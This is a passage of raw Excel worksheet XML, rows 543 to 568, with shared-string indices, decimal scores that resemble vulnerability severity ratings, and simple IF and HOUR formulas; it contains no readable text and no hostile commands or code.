      <c r="U543" s="4"/>
      <c r="V543" s="7"/>
    </row>
    <row r="544" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A544" s="3" t="s">
        <v>3027</v>
      </c>
      <c r="B544" s="4" t="s">
        <v>3034</v>
      </c>
      <c r="C544" s="4" t="s">
        <v>3035</v>
      </c>
      <c r="D544" s="4" t="s">
        <v>961</v>
      </c>
      <c r="E544" s="4" t="s">
        <v>962</v>
      </c>
      <c r="F544" s="4" t="s">
        <v>3036</v>
      </c>
      <c r="G544" s="4" t="s">
        <v>3037</v>
      </c>
      <c r="H544" s="4">
        <v>6.5</v>
      </c>
      <c r="I544" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J544" s="4"/>
      <c r="K544" s="4"/>
      <c r="L544" s="4">
        <f>IF(out!$G544="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M544" s="4"/>
      <c r="N544" s="4"/>
      <c r="O544" s="13"/>
      <c r="P544" s="4"/>
      <c r="Q544" s="13">
        <f>HOUR(out!$P544 -out!$N544)</f>
        <v>0</v>
      </c>
      <c r="R544" s="18"/>
      <c r="S544" s="4"/>
      <c r="T544" s="4"/>
      <c r="U544" s="4"/>
      <c r="V544" s="7"/>
    </row>
    <row r="545" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A545" s="3" t="s">
        <v>3038</v>
      </c>
      <c r="B545" s="4" t="s">
        <v>3039</v>
      </c>
      <c r="C545" s="4" t="s">
        <v>3040</v>
      </c>
      <c r="D545" s="4" t="s">
        <v>522</v>
      </c>
      <c r="E545" s="4" t="s">
        <v>523</v>
      </c>
      <c r="F545" s="4" t="s">
        <v>3041</v>
      </c>
      <c r="G545" s="4" t="s">
        <v>3042</v>
      </c>
      <c r="H545" s="4">
        <v>6.5</v>
      </c>
      <c r="I545" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J545" s="4"/>
      <c r="K545" s="4"/>
      <c r="L545" s="4">
        <f>IF(out!$G545="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M545" s="4"/>
      <c r="N545" s="4"/>
      <c r="O545" s="13"/>
      <c r="P545" s="4"/>
      <c r="Q545" s="13">
        <f>HOUR(out!$P545 -out!$N545)</f>
        <v>0</v>
      </c>
      <c r="R545" s="18"/>
      <c r="S545" s="4"/>
      <c r="T545" s="4"/>
      <c r="U545" s="4"/>
      <c r="V545" s="7"/>
    </row>
    <row r="546" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A546" s="3" t="s">
        <v>3043</v>
      </c>
      <c r="B546" s="4" t="s">
        <v>3044</v>
      </c>
      <c r="C546" s="4" t="s">
        <v>3045</v>
      </c>
      <c r="D546" s="4" t="s">
        <v>1944</v>
      </c>
      <c r="E546" s="4" t="s">
        <v>1945</v>
      </c>
      <c r="F546" s="4" t="s">
        <v>3046</v>
      </c>
      <c r="G546" s="4" t="s">
        <v>3047</v>
      </c>
      <c r="H546" s="4">
        <v>6.5</v>
      </c>
      <c r="I546" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J546" s="4"/>
      <c r="K546" s="4"/>
      <c r="L546" s="4">
        <f>IF(out!$G546="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M546" s="4"/>
      <c r="N546" s="4"/>
      <c r="O546" s="13"/>
      <c r="P546" s="4"/>
      <c r="Q546" s="13">
        <f>HOUR(out!$P546 -out!$N546)</f>
        <v>0</v>
      </c>
      <c r="R546" s="18"/>
      <c r="S546" s="4"/>
      <c r="T546" s="4"/>
      <c r="U546" s="4"/>
      <c r="V546" s="7"/>
    </row>
    <row r="547" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A547" s="3" t="s">
        <v>3048</v>
      </c>
      <c r="B547" s="4" t="s">
        <v>3049</v>
      </c>
      <c r="C547" s="4" t="s">
        <v>3050</v>
      </c>
      <c r="D547" s="4" t="s">
        <v>941</v>
      </c>
      <c r="E547" s="4" t="s">
        <v>942</v>
      </c>
      <c r="F547" s="4" t="s">
        <v>814</v>
      </c>
      <c r="G547" s="4" t="s">
        <v>815</v>
      </c>
      <c r="H547" s="4">
        <v>7.5</v>
      </c>
      <c r="I547" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J547" s="4"/>
      <c r="K547" s="4"/>
      <c r="L547" s="4">
        <f>IF(out!$G547="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M547" s="4"/>
      <c r="N547" s="4"/>
      <c r="O547" s="13"/>
      <c r="P547" s="4"/>
      <c r="Q547" s="13">
        <f>HOUR(out!$P547 -out!$N547)</f>
        <v>0</v>
      </c>
      <c r="R547" s="18"/>
      <c r="S547" s="4"/>
      <c r="T547" s="4"/>
      <c r="U547" s="4"/>
      <c r="V547" s="7"/>
    </row>
    <row r="548" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A548" s="3" t="s">
        <v>3051</v>
      </c>
      <c r="B548" s="4" t="s">
        <v>3052</v>
      </c>
      <c r="C548" s="4" t="s">
        <v>3053</v>
      </c>
      <c r="D548" s="4" t="s">
        <v>1944</v>
      </c>
      <c r="E548" s="4" t="s">
        <v>1945</v>
      </c>
      <c r="F548" s="4" t="s">
        <v>3054</v>
      </c>
      <c r="G548" s="4" t="s">
        <v>3055</v>
      </c>
      <c r="H548" s="4">
        <v>7.5</v>
      </c>
      <c r="I548" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J548" s="4"/>
      <c r="K548" s="4"/>
      <c r="L548" s="4">
        <f>IF(out!$G548="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M548" s="4"/>
      <c r="N548" s="4"/>
      <c r="O548" s="13"/>
      <c r="P548" s="4"/>
      <c r="Q548" s="13">
        <f>HOUR(out!$P548 -out!$N548)</f>
        <v>0</v>
      </c>
      <c r="R548" s="18"/>
      <c r="S548" s="4"/>
      <c r="T548" s="4"/>
      <c r="U548" s="4"/>
      <c r="V548" s="7"/>
    </row>
    <row r="549" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A549" s="3" t="s">
        <v>3056</v>
      </c>
      <c r="B549" s="4" t="s">
        <v>3057</v>
      </c>
      <c r="C549" s="4" t="s">
        <v>3058</v>
      </c>
      <c r="D549" s="4" t="s">
        <v>3059</v>
      </c>
      <c r="E549" s="4" t="s">
        <v>3060</v>
      </c>
      <c r="F549" s="4" t="s">
        <v>3061</v>
      </c>
      <c r="G549" s="4" t="s">
        <v>2823</v>
      </c>
      <c r="H549" s="4">
        <v>5.3</v>
      </c>
      <c r="I549" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J549" s="4"/>
      <c r="K549" s="4"/>
      <c r="L549" s="4">
        <f>IF(out!$G549="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M549" s="4"/>
      <c r="N549" s="4"/>
      <c r="O549" s="13"/>
      <c r="P549" s="4"/>
      <c r="Q549" s="13">
        <f>HOUR(out!$P549 -out!$N549)</f>
        <v>0</v>
      </c>
      <c r="R549" s="18"/>
      <c r="S549" s="4"/>
      <c r="T549" s="4"/>
      <c r="U549" s="4"/>
      <c r="V549" s="7"/>
    </row>
    <row r="550" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A550" s="3" t="s">
        <v>3056</v>
      </c>
      <c r="B550" s="4" t="s">
        <v>3062</v>
      </c>
      <c r="C550" s="4" t="s">
        <v>3063</v>
      </c>
      <c r="D550" s="4" t="s">
        <v>3064</v>
      </c>
      <c r="E550" s="4" t="s">
        <v>3065</v>
      </c>
      <c r="F550" s="4" t="s">
        <v>3066</v>
      </c>
      <c r="G550" s="4" t="s">
        <v>3067</v>
      </c>
      <c r="H550" s="4">
        <v>5.3</v>
      </c>
      <c r="I550" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J550" s="4"/>
      <c r="K550" s="4"/>
      <c r="L550" s="4">
        <f>IF(out!$G550="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M550" s="4"/>
      <c r="N550" s="4"/>
      <c r="O550" s="13"/>
      <c r="P550" s="4"/>
      <c r="Q550" s="13">
        <f>HOUR(out!$P550 -out!$N550)</f>
        <v>0</v>
      </c>
      <c r="R550" s="18"/>
      <c r="S550" s="4"/>
      <c r="T550" s="4"/>
      <c r="U550" s="4"/>
      <c r="V550" s="7"/>
    </row>
    <row r="551" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A551" s="3" t="s">
        <v>3068</v>
      </c>
      <c r="B551" s="4" t="s">
        <v>3069</v>
      </c>
      <c r="C551" s="4" t="s">
        <v>3070</v>
      </c>
      <c r="D551" s="4" t="s">
        <v>3071</v>
      </c>
      <c r="E551" s="4" t="s">
        <v>3072</v>
      </c>
      <c r="F551" s="4" t="s">
        <v>3073</v>
      </c>
      <c r="G551" s="4" t="s">
        <v>3074</v>
      </c>
      <c r="H551" s="4">
        <v>4.3</v>
      </c>
      <c r="I551" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J551" s="4"/>
      <c r="K551" s="4"/>
      <c r="L551" s="4">
        <f>IF(out!$G551="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M551" s="4"/>
      <c r="N551" s="4"/>
      <c r="O551" s="13"/>
      <c r="P551" s="4"/>
      <c r="Q551" s="13">
        <f>HOUR(out!$P551 -out!$N551)</f>
        <v>0</v>
      </c>
      <c r="R551" s="18"/>
      <c r="S551" s="4"/>
      <c r="T551" s="4"/>
      <c r="U551" s="4"/>
      <c r="V551" s="7"/>
    </row>
    <row r="552" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A552" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B552" s="4" t="s">
        <v>3075</v>
      </c>
      <c r="C552" s="4" t="s">
        <v>3076</v>
      </c>
      <c r="D552" s="4" t="s">
        <v>3077</v>
      </c>
      <c r="E552" s="4" t="s">
        <v>3078</v>
      </c>
      <c r="F552" s="4" t="s">
        <v>3079</v>
      </c>
      <c r="G552" s="4" t="s">
        <v>2905</v>
      </c>
      <c r="H552" s="4">
        <v>5.3</v>
      </c>
      <c r="I552" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J552" s="4"/>
      <c r="K552" s="4"/>
      <c r="L552" s="4">
        <f>IF(out!$G552="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M552" s="4"/>
      <c r="N552" s="4"/>
      <c r="O552" s="13"/>
      <c r="P552" s="4"/>
      <c r="Q552" s="13">
        <f>HOUR(out!$P552 -out!$N552)</f>
        <v>0</v>
      </c>
      <c r="R552" s="18"/>
      <c r="S552" s="4"/>
      <c r="T552" s="4"/>
      <c r="U552" s="4"/>
      <c r="V552" s="7"/>
    </row>
    <row r="553" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A553" s="3" t="s">
        <v>3080</v>
      </c>
      <c r="B553" s="4" t="s">
        <v>3081</v>
      </c>
      <c r="C553" s="4" t="s">
        <v>3082</v>
      </c>
      <c r="D553" s="4" t="s">
        <v>3083</v>
      </c>
      <c r="E553" s="4" t="s">
        <v>3084</v>
      </c>
      <c r="F553" s="4" t="s">
        <v>54</v>
      </c>
      <c r="G553" s="4" t="s">
        <v>55</v>
      </c>
      <c r="H553" s="4">
        <v>7.5</v>
      </c>
      <c r="I553" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J553" s="4"/>
      <c r="K553" s="4"/>
      <c r="L553" s="4">
        <f>IF(out!$G553="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M553" s="4"/>
      <c r="N553" s="4"/>
      <c r="O553" s="13"/>
      <c r="P553" s="4"/>
      <c r="Q553" s="13">
        <f>HOUR(out!$P553 -out!$N553)</f>
        <v>0</v>
      </c>
      <c r="R553" s="18"/>
      <c r="S553" s="4"/>
      <c r="T553" s="4"/>
      <c r="U553" s="4"/>
      <c r="V553" s="7"/>
    </row>
    <row r="554" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A554" s="3" t="s">
        <v>3085</v>
      </c>
      <c r="B554" s="4" t="s">
        <v>3086</v>
      </c>
      <c r="C554" s="4" t="s">
        <v>3087</v>
      </c>
      <c r="D554" s="4" t="s">
        <v>3088</v>
      </c>
      <c r="E554" s="4" t="s">
        <v>3089</v>
      </c>
      <c r="F554" s="4" t="s">
        <v>3090</v>
      </c>
      <c r="G554" s="4" t="s">
        <v>3091</v>
      </c>
      <c r="H554" s="4">
        <v>5.3</v>
      </c>
      <c r="I554" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J554" s="4"/>
      <c r="K554" s="4"/>
      <c r="L554" s="4">
        <f>IF(out!$G554="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M554" s="4"/>
      <c r="N554" s="4"/>
      <c r="O554" s="13"/>
      <c r="P554" s="4"/>
      <c r="Q554" s="13">
        <f>HOUR(out!$P554 -out!$N554)</f>
        <v>0</v>
      </c>
      <c r="R554" s="18"/>
      <c r="S554" s="4"/>
      <c r="T554" s="4"/>
      <c r="U554" s="4"/>
      <c r="V554" s="7"/>
    </row>
    <row r="555" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A555" s="3" t="s">
        <v>3092</v>
      </c>
      <c r="B555" s="4" t="s">
        <v>3093</v>
      </c>
      <c r="C555" s="4" t="s">
        <v>3094</v>
      </c>
      <c r="D555" s="4" t="s">
        <v>3095</v>
      </c>
      <c r="E555" s="4" t="s">
        <v>3096</v>
      </c>
      <c r="F555" s="4" t="s">
        <v>3097</v>
      </c>
      <c r="G555" s="4" t="s">
        <v>3098</v>
      </c>
      <c r="H555" s="4">
        <v>6.5</v>
      </c>
      <c r="I555" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J555" s="4"/>
      <c r="K555" s="4"/>
      <c r="L555" s="4">
        <f>IF(out!$G555="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M555" s="4"/>
      <c r="N555" s="4"/>
      <c r="O555" s="13"/>
      <c r="P555" s="4"/>
      <c r="Q555" s="13">
        <f>HOUR(out!$P555 -out!$N555)</f>
        <v>0</v>
      </c>
      <c r="R555" s="18"/>
      <c r="S555" s="4"/>
      <c r="T555" s="4"/>
      <c r="U555" s="4"/>
      <c r="V555" s="7"/>
    </row>
    <row r="556" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A556" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B556" s="4" t="s">
        <v>3099</v>
      </c>
      <c r="C556" s="4" t="s">
        <v>3100</v>
      </c>
      <c r="D556" s="4" t="s">
        <v>3101</v>
      </c>
      <c r="E556" s="4" t="s">
        <v>3102</v>
      </c>
      <c r="F556" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G556" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H556" s="4">
        <v>7.5</v>
      </c>
      <c r="I556" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J556" s="4"/>
      <c r="K556" s="4"/>
      <c r="L556" s="4">
        <f>IF(out!$G556="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M556" s="4"/>
      <c r="N556" s="4"/>
      <c r="O556" s="13"/>
      <c r="P556" s="4"/>
      <c r="Q556" s="13">
        <f>HOUR(out!$P556 -out!$N556)</f>
        <v>0</v>
      </c>
      <c r="R556" s="18"/>
      <c r="S556" s="4"/>
      <c r="T556" s="4"/>
      <c r="U556" s="4"/>
      <c r="V556" s="7"/>
    </row>
    <row r="557" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A557" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B557" s="4" t="s">
        <v>3103</v>
      </c>
      <c r="C557" s="4" t="s">
        <v>3104</v>
      </c>
      <c r="D557" s="4" t="s">
        <v>3105</v>
      </c>
      <c r="E557" s="4" t="s">
        <v>3106</v>
      </c>
      <c r="F557" s="4" t="s">
        <v>3107</v>
      </c>
      <c r="G557" s="4" t="s">
        <v>3108</v>
      </c>
      <c r="H557" s="4">
        <v>5.3</v>
      </c>
      <c r="I557" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J557" s="4"/>
      <c r="K557" s="4"/>
      <c r="L557" s="4">
        <f>IF(out!$G557="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M557" s="4"/>
      <c r="N557" s="4"/>
      <c r="O557" s="13"/>
      <c r="P557" s="4"/>
      <c r="Q557" s="13">
        <f>HOUR(out!$P557 -out!$N557)</f>
        <v>0</v>
      </c>
      <c r="R557" s="18"/>
      <c r="S557" s="4"/>
      <c r="T557" s="4"/>
      <c r="U557" s="4"/>
      <c r="V557" s="7"/>
    </row>
    <row r="558" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A558" s="3" t="s">
        <v>3109</v>
      </c>
      <c r="B558" s="4" t="s">
        <v>3110</v>
      </c>
      <c r="C558" s="4" t="s">
        <v>3111</v>
      </c>
      <c r="D558" s="4" t="s">
        <v>3112</v>
      </c>
      <c r="E558" s="4" t="s">
        <v>3113</v>
      </c>
      <c r="F558" s="4" t="s">
        <v>3114</v>
      </c>
      <c r="G558" s="4" t="s">
        <v>3115</v>
      </c>
      <c r="H558" s="4">
        <v>5.3</v>
      </c>
      <c r="I558" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J558" s="4"/>
      <c r="K558" s="4"/>
      <c r="L558" s="4">
        <f>IF(out!$G558="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M558" s="4"/>
      <c r="N558" s="4"/>
      <c r="O558" s="13"/>
      <c r="P558" s="4"/>
      <c r="Q558" s="13">
        <f>HOUR(out!$P558 -out!$N558)</f>
        <v>0</v>
      </c>
      <c r="R558" s="18"/>
      <c r="S558" s="4"/>
      <c r="T558" s="4"/>
      <c r="U558" s="4"/>
      <c r="V558" s="7"/>
    </row>
    <row r="559" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A559" s="3" t="s">
        <v>3116</v>
      </c>
      <c r="B559" s="4" t="s">
        <v>3117</v>
      </c>
      <c r="C559" s="4" t="s">
        <v>3118</v>
      </c>
      <c r="D559" s="4" t="s">
        <v>3015</v>
      </c>
      <c r="E559" s="4" t="s">
        <v>3016</v>
      </c>
      <c r="F559" s="4" t="s">
        <v>3119</v>
      </c>
      <c r="G559" s="4" t="s">
        <v>3120</v>
      </c>
      <c r="H559" s="4">
        <v>4.8</v>
      </c>
      <c r="I559" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J559" s="4"/>
      <c r="K559" s="4"/>
      <c r="L559" s="4">
        <f>IF(out!$G559="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M559" s="4"/>
      <c r="N559" s="4"/>
      <c r="O559" s="13"/>
      <c r="P559" s="4"/>
      <c r="Q559" s="13">
        <f>HOUR(out!$P559 -out!$N559)</f>
        <v>0</v>
      </c>
      <c r="R559" s="18"/>
      <c r="S559" s="4"/>
      <c r="T559" s="4"/>
      <c r="U559" s="4"/>
      <c r="V559" s="7"/>
    </row>
    <row r="560" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A560" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B560" s="4" t="s">
        <v>3121</v>
      </c>
      <c r="C560" s="4" t="s">
        <v>3122</v>
      </c>
      <c r="D560" s="4" t="s">
        <v>3123</v>
      </c>
      <c r="E560" s="4" t="s">
        <v>3124</v>
      </c>
      <c r="F560" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G560" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H560" s="4">
        <v>5.3</v>
      </c>
      <c r="I560" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J560" s="4"/>
      <c r="K560" s="4"/>
      <c r="L560" s="4">
        <f>IF(out!$G560="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M560" s="4"/>
      <c r="N560" s="4"/>
      <c r="O560" s="13"/>
      <c r="P560" s="4"/>
      <c r="Q560" s="13">
        <f>HOUR(out!$P560 -out!$N560)</f>
        <v>0</v>
      </c>
      <c r="R560" s="18"/>
      <c r="S560" s="4"/>
      <c r="T560" s="4"/>
      <c r="U560" s="4"/>
      <c r="V560" s="7"/>
    </row>
    <row r="561" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A561" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B561" s="4" t="s">
        <v>3125</v>
      </c>
      <c r="C561" s="4" t="s">
        <v>3126</v>
      </c>
      <c r="D561" s="4" t="s">
        <v>3127</v>
      </c>
      <c r="E561" s="4" t="s">
        <v>3128</v>
      </c>
      <c r="F561" s="4" t="s">
        <v>790</v>
      </c>
      <c r="G561" s="4" t="s">
        <v>3129</v>
      </c>
      <c r="H561" s="4">
        <v>5.3</v>
      </c>
      <c r="I561" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J561" s="4"/>
      <c r="K561" s="4"/>
      <c r="L561" s="4">
        <f>IF(out!$G561="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M561" s="4"/>
      <c r="N561" s="4"/>
      <c r="O561" s="13"/>
      <c r="P561" s="4"/>
      <c r="Q561" s="13">
        <f>HOUR(out!$P561 -out!$N561)</f>
        <v>0</v>
      </c>
      <c r="R561" s="18"/>
      <c r="S561" s="4"/>
      <c r="T561" s="4"/>
      <c r="U561" s="4"/>
      <c r="V561" s="7"/>
    </row>
    <row r="562" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A562" s="3" t="s">
        <v>3130</v>
      </c>
      <c r="B562" s="4" t="s">
        <v>3131</v>
      </c>
      <c r="C562" s="4" t="s">
        <v>3132</v>
      </c>
      <c r="D562" s="4" t="s">
        <v>1944</v>
      </c>
      <c r="E562" s="4" t="s">
        <v>1945</v>
      </c>
      <c r="F562" s="4" t="s">
        <v>3133</v>
      </c>
      <c r="G562" s="4" t="s">
        <v>3134</v>
      </c>
      <c r="H562" s="4">
        <v>5.3</v>
      </c>
      <c r="I562" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J562" s="4"/>
      <c r="K562" s="4"/>
      <c r="L562" s="4">
        <f>IF(out!$G562="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M562" s="4"/>
      <c r="N562" s="4"/>
      <c r="O562" s="13"/>
      <c r="P562" s="4"/>
      <c r="Q562" s="13">
        <f>HOUR(out!$P562 -out!$N562)</f>
        <v>0</v>
      </c>
      <c r="R562" s="18"/>
      <c r="S562" s="4"/>
      <c r="T562" s="4"/>
      <c r="U562" s="4"/>
      <c r="V562" s="7"/>
    </row>
    <row r="563" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A563" s="3" t="s">
        <v>3135</v>
      </c>
      <c r="B563" s="4" t="s">
        <v>3136</v>
      </c>
      <c r="C563" s="4" t="s">
        <v>3137</v>
      </c>
      <c r="D563" s="4" t="s">
        <v>3138</v>
      </c>
      <c r="E563" s="4" t="s">
        <v>3139</v>
      </c>
      <c r="F563" s="4" t="s">
        <v>3140</v>
      </c>
      <c r="G563" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H563" s="4">
        <v>5.3</v>
      </c>
      <c r="I563" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J563" s="4"/>
      <c r="K563" s="4"/>
      <c r="L563" s="4">
        <f>IF(out!$G563="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M563" s="4"/>
      <c r="N563" s="4"/>
      <c r="O563" s="13"/>
      <c r="P563" s="4"/>
      <c r="Q563" s="13">
        <f>HOUR(out!$P563 -out!$N563)</f>
        <v>0</v>
      </c>
      <c r="R563" s="18"/>
      <c r="S563" s="4"/>
      <c r="T563" s="4"/>
      <c r="U563" s="4"/>
      <c r="V563" s="7"/>
    </row>
    <row r="564" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A564" s="3" t="s">
        <v>3135</v>
      </c>
      <c r="B564" s="4" t="s">
        <v>3141</v>
      </c>
      <c r="C564" s="4" t="s">
        <v>3142</v>
      </c>
      <c r="D564" s="4" t="s">
        <v>3143</v>
      </c>
      <c r="E564" s="4" t="s">
        <v>3144</v>
      </c>
      <c r="F564" s="4" t="s">
        <v>3145</v>
      </c>
      <c r="G564" s="4" t="s">
        <v>3146</v>
      </c>
      <c r="H564" s="4">
        <v>6.5</v>
      </c>
      <c r="I564" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J564" s="4"/>
      <c r="K564" s="4"/>
      <c r="L564" s="4">
        <f>IF(out!$G564="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M564" s="4"/>
      <c r="N564" s="4"/>
      <c r="O564" s="13"/>
      <c r="P564" s="4"/>
      <c r="Q564" s="13">
        <f>HOUR(out!$P564 -out!$N564)</f>
        <v>0</v>
      </c>
      <c r="R564" s="18"/>
      <c r="S564" s="4"/>
      <c r="T564" s="4"/>
      <c r="U564" s="4"/>
      <c r="V564" s="7"/>
    </row>
    <row r="565" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A565" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B565" s="4" t="s">
        <v>3147</v>
      </c>
      <c r="C565" s="4" t="s">
        <v>3142</v>
      </c>
      <c r="D565" s="4" t="s">
        <v>3148</v>
      </c>
      <c r="E565" s="4" t="s">
        <v>3149</v>
      </c>
      <c r="F565" s="4" t="s">
        <v>3150</v>
      </c>
      <c r="G565" s="4" t="s">
        <v>3151</v>
      </c>
      <c r="H565" s="4">
        <v>6.5</v>
      </c>
      <c r="I565" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J565" s="4"/>
      <c r="K565" s="4"/>
      <c r="L565" s="4">
        <f>IF(out!$G565="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M565" s="4"/>
      <c r="N565" s="4"/>
      <c r="O565" s="13"/>
      <c r="P565" s="4"/>
      <c r="Q565" s="13">
        <f>HOUR(out!$P565 -out!$N565)</f>
        <v>0</v>
      </c>
      <c r="R565" s="18"/>
      <c r="S565" s="4"/>
      <c r="T565" s="4"/>
      <c r="U565" s="4"/>
      <c r="V565" s="7"/>
    </row>
    <row r="566" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A566" s="3" t="s">
        <v>3152</v>
      </c>
      <c r="B566" s="4" t="s">
        <v>3153</v>
      </c>
      <c r="C566" s="4" t="s">
        <v>3154</v>
      </c>
      <c r="D566" s="4" t="s">
        <v>3105</v>
      </c>
      <c r="E566" s="4" t="s">
        <v>3106</v>
      </c>
      <c r="F566" s="4" t="s">
        <v>3155</v>
      </c>
      <c r="G566" s="4" t="s">
        <v>3156</v>
      </c>
      <c r="H566" s="4">
        <v>8.3000000000000007</v>
      </c>
      <c r="I566" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J566" s="4"/>
      <c r="K566" s="4"/>
      <c r="L566" s="4">
        <f>IF(out!$G566="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M566" s="4"/>
      <c r="N566" s="4"/>
      <c r="O566" s="13"/>
      <c r="P566" s="4"/>
      <c r="Q566" s="13">
        <f>HOUR(out!$P566 -out!$N566)</f>
        <v>0</v>
      </c>
      <c r="R566" s="18"/>
      <c r="S566" s="4"/>
      <c r="T566" s="4"/>
      <c r="U566" s="4"/>
      <c r="V566" s="7"/>
    </row>
    <row r="567" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A567" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B567" s="4" t="s">
        <v>3157</v>
      </c>
      <c r="C567" s="4" t="s">
        <v>3158</v>
      </c>
      <c r="D567" s="4" t="s">
        <v>3159</v>
      </c>
      <c r="E567" s="4" t="s">
        <v>3160</v>
      </c>
      <c r="F567" s="4" t="s">
        <v>3161</v>
      </c>
      <c r="G567" s="4" t="s">
        <v>3162</v>
      </c>
      <c r="H567" s="4">
        <v>5.3</v>
      </c>
      <c r="I567" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J567" s="4"/>
      <c r="K567" s="4"/>
      <c r="L567" s="4">
        <f>IF(out!$G567="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M567" s="4"/>
      <c r="N567" s="4"/>
      <c r="O567" s="13"/>
      <c r="P567" s="4"/>
      <c r="Q567" s="13">
        <f>HOUR(out!$P567 -out!$N567)</f>
        <v>0</v>
      </c>
      <c r="R567" s="18"/>
      <c r="S567" s="4"/>
      <c r="T567" s="4"/>
      <c r="U567" s="4"/>
      <c r="V567" s="7"/>
    </row>
    <row r="568" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A568" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B568" s="4" t="s">
        <v>3175</v>
      </c>
      <c r="C568" s="4" t="s">
        <v>3176</v>
      </c>
      <c r="D568" s="4" t="s">
        <v>3177</v>
      </c>
      <c r="E568" s="4" t="s">
        <v>3178</v>
      </c>
      <c r="F568" s="4" t="s">
        <v>3179</v>
      </c>
      <c r="G568" s="4" t="s">
        <v>3180</v>
      </c>
      <c r="H568" s="4">
        <v>5.3</v>
      </c>
      <c r="I568" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J568" s="4"/>
      <c r="K568" s="4"/>
      <c r="L568" s="4">
        <f>IF(out!$G568="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M568" s="4"/>
      <c r="N568" s="4"/>
      <c r="O568" s="13"/>
      <c r="P568" s="4"/>
      <c r="Q568" s="13">
        <f>HOUR(out!$P568 -out!$N568)</f>
        <v>0</v>
      </c>
      <c r="R568" s="18"/>
      <c r="S568" s="4"/>
      <c r="T568" s="4"/>
      <c r="U568" s="4"/>
